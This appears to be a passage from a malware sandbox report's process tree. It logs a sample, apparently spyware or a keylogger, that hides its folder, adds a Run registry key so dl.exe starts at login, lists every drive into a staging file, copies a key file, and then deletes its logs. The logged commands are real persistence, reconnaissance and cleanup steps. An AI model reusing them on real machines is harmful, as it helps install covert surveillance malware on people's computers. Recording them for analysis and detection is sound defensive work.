C:\Windows\SysWOW64\attrib.exeattrib +h +r +s c:\Users\public\windows3⤵
- Views/modifies file attributes
PID:1520 -
C:\Windows\SysWOW64\cmd.execmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f2⤵PID:2880
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f3⤵
- Adds Run key to start application
PID:4972 -
C:\Windows\SysWOW64\cmd.execmd /c dir C:\ > C:\users\public\windows\Att\abban.txt2⤵PID:4524
-
C:\Windows\SysWOW64\cmd.execmd /c dir B:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:560
-
C:\Windows\SysWOW64\cmd.execmd /c dir A:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:5000
-
C:\Windows\SysWOW64\cmd.execmd /c if exist C:\users\public\windows\windows.exe explorer C:\users\public\windows\windows.exe2⤵PID:2116
-
C:\Windows\SysWOW64\cmd.execmd /c copy /y C:\users\public\windows\key.sys C:\users\public\windows\Att\key.txt2⤵PID:1180
-
C:\Windows\SysWOW64\cmd.execmd /c dir z:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3732
-
C:\Windows\SysWOW64\cmd.execmd /c dir Y:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1504
-
C:\Windows\SysWOW64\cmd.execmd /c dir X:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:460
-
C:\Windows\SysWOW64\cmd.execmd /c dir W:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3984
-
C:\Windows\SysWOW64\cmd.execmd /c dir V:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3268
-
C:\Windows\SysWOW64\cmd.execmd /c dir U:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2200
-
C:\Windows\SysWOW64\cmd.execmd /c dir T:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4888
-
C:\Windows\SysWOW64\cmd.execmd /c dir S:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1616
-
C:\Windows\SysWOW64\cmd.execmd /c dir E:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2896
-
C:\Windows\SysWOW64\cmd.execmd /c dir F:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4500
-
C:\Windows\SysWOW64\cmd.execmd /c dir P:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3736
-
C:\Windows\SysWOW64\cmd.execmd /c dir O:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4620
-
C:\Windows\SysWOW64\cmd.execmd /c dir N:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:5016
-
C:\Windows\SysWOW64\cmd.execmd /c dir M:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2440
-
C:\Windows\SysWOW64\cmd.execmd /c dir L:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3512
-
C:\Windows\SysWOW64\cmd.execmd /c dir K:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:548
-
C:\Windows\SysWOW64\cmd.execmd /c dir J:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3900
-
C:\Windows\SysWOW64\cmd.execmd /c dir I:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2648
-
C:\Windows\SysWOW64\cmd.execmd /c dir H:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:5112
-
C:\Windows\SysWOW64\cmd.execmd /c dir G:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:116
-
C:\Windows\SysWOW64\cmd.execmd /c dir Q:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4572
-
C:\Windows\SysWOW64\cmd.execmd /c dir R:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2312
-
C:\Windows\SysWOW64\cmd.execmd /c dir D:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1096
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\pic.jpg2⤵PID:4776
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\log.txt2⤵PID:3988
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\key.txt2⤵PID:3860
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4220